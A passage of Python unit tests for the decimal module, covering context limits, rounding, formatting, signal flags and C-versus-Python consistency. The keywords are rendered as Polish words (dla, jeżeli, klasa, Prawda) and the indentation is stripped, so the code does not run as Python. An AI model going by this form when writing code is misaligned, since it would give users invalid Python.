self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
dla signal w (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertPrawda(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
jeżeli self.decimal == C:
dla signal w (Inexact, Overflow, Rounded):
self.assertPrawda(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
dla signal w (Rounded, DivisionByZero):
self.assertPrawda(c.flags[signal])
c.clear_flags()
dla signal w OrderedSignals[decimal]:
self.assertNieprawda(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
dla signal w (Rounded, DivisionByZero):
self.assertPrawda(c.traps[signal])
c.clear_traps()
dla signal w OrderedSignals[decimal]:
self.assertNieprawda(c.traps[signal])
klasa CContextSubclassing(ContextSubclassing):
decimal = C
klasa PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
klasa CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertPrawda(C.HAVE_THREADS jest Prawda albo C.HAVE_THREADS jest Nieprawda)
self.assertPrawda(P.HAVE_THREADS jest Prawda albo P.HAVE_THREADS jest Nieprawda)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(C.__libmpdec_version__, P.__libmpdec_version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s dla s w dir(C.Context()) jeżeli '__' w s albo nie s.startswith('_')]
y = [s dla s w dir(P.Context()) jeżeli '__' w s albo nie s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s dla s w dir(C.Decimal(9)) jeżeli '__' w s albo nie s.startswith('_')]
y = [s dla s w dir(C.Decimal(9)) jeżeli '__' w s albo nie s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
klasa Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX podnieś?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
dla sig w OrderedSignals[self.decimal]:
c.flags[sig] = Nieprawda
c.traps[sig] = Nieprawda
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
przy localcontext() jako c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), Prawda)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), Nieprawda)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), Prawda)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertPrawda(Decimal("1").is_canonical())
self.assertPrawda(Decimal("1").is_finite())
self.assertPrawda(Decimal("1").is_finite())
self.assertPrawda(Decimal("snan").is_snan())
self.assertPrawda(Decimal("-1").is_signed())
self.assertPrawda(Decimal("0").is_zero())
self.assertPrawda(Decimal("0").is_zero())
# Copy
przy localcontext() jako c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
przy localcontext() jako c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertPrawda(q.is_nan() oraz r.is_nan())
c.traps[InvalidOperation] = Nieprawda
q, r = divmod(Decimal("NaN"), 7)
self.assertPrawda(q.is_nan() oraz r.is_nan())
c.traps[InvalidOperation] = Nieprawda
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertPrawda(q.is_nan() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertPrawda(q.is_infinite() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertPrawda(q.is_nan() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation])
c.traps[DivisionByZero] = Nieprawda
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertPrawda(q.is_infinite() oraz r.is_nan())
self.assertPrawda(c.flags[InvalidOperation] oraz
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
przy localcontext() jako c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertPrawda(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = Nieprawda
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertPrawda(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
przy localcontext() jako c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = Nieprawda
x = Decimal(99).quantize(Decimal("1e1"))
self.assertPrawda(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
dla attr w ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
przy localcontext() jako c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
klasa CCoverage(Coverage):
decimal = C
klasa PyCoverage(Coverage):
decimal = P
klasa PyFunctionality(unittest.TestCase):
"""Extra functionality w decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, oraz the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
dla fmt, d, result w test_values:
self.assertEqual(format(Decimal(d), fmt), result)
klasa PyWhitebox(unittest.TestCase):
"""White box testing dla decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines w _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
przy localcontext() jako c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations oraz check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) dla s w OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=Nieprawda):
jeżeli useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
inaczej:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", Prawda)
checkSameDec("__divmod__", Prawda)
checkSameDec("__eq__", Prawda)
checkSameDec("__ne__", Prawda)
checkSameDec("__le__", Prawda)
checkSameDec("__lt__", Prawda)
checkSameDec("__ge__", Prawda)
checkSameDec("__gt__", Prawda)
checkSameDec("__float__")
checkSameDec("__floordiv__", Prawda)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", Prawda)
checkSameDec("__mul__", Prawda)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", Prawda)
checkSameDec("__radd__", Prawda)
checkSameDec("__rdivmod__", Prawda)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", Prawda)
checkSameDec("__rmod__", Prawda)
checkSameDec("__rmul__", Prawda)
checkSameDec("__rpow__", Prawda)
checkSameDec("__rsub__", Prawda)
checkSameDec("__str__")
checkSameDec("__sub__", Prawda)
checkSameDec("__truediv__", Prawda)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", Prawda)
checkSameDec("max", Prawda)
checkSameDec("min", Prawda)
checkSameDec("normalize")
checkSameDec("quantize", Prawda)
checkSameDec("remainder_near", Prawda)
checkSameDec("same_quantum", Prawda)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
przy localcontext() jako c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertPrawda(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
klasa CFunctionality(unittest.TestCase):
"""Extra functionality w _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support dla IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
dla i, v w enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
klasa CWhitebox(unittest.TestCase):
"""Whitebox testing dla _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow przy pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
przy localcontext() jako c:
c.prec = 1000000
dla i w range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large dla _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
przy localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test jest _decimal-only because flags are nie printed
# w the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
dla sig w OrderedSignals[C]:
c.flags[sig] = Prawda
c.traps[sig] = Prawda
c.flags[FloatOperation] = Prawda
c.traps[FloatOperation] = Prawda
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c,'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment z a signal dict przy the correct length but
# one invalid key.
d = c.flags.copy()
usuń d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 jeżeli HAVE_CONFIG_64 inaczej 2**31-1
gt_max_emax = 10**18 jeżeli HAVE_CONFIG_64 inaczej 10**9
# prec, Emax, Emin
dla attr w ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin w context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow w conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
dla attr w ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
jeżeli sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
jeżeli C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
jeżeli C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
dla attr w ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
jeżeli HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'przy localcontext("xyz"): dalej',
locals())
self.assertRaises(TypeError, exec,
'przy localcontext(context=getcontext()): dalej',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 jeżeli HAVE_CONFIG_64 inaczej 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
jeżeli sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
dla attr w ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
jeżeli sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
jeżeli HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
dla attr w ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are dla code coverage w _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters oraz setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
jeżeli C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 jeżeli C.MAX_PREC > 425000000 inaczej 2**31-1
przy localcontext() jako c:
c.traps[InvalidOperation] = Prawda
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 jeżeli HAVE_CONFIG_64 inaczej 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
przy localcontext() jako c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = Prawda
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
przy localcontext() jako c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = Prawda
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertPrawda(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = Prawda
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
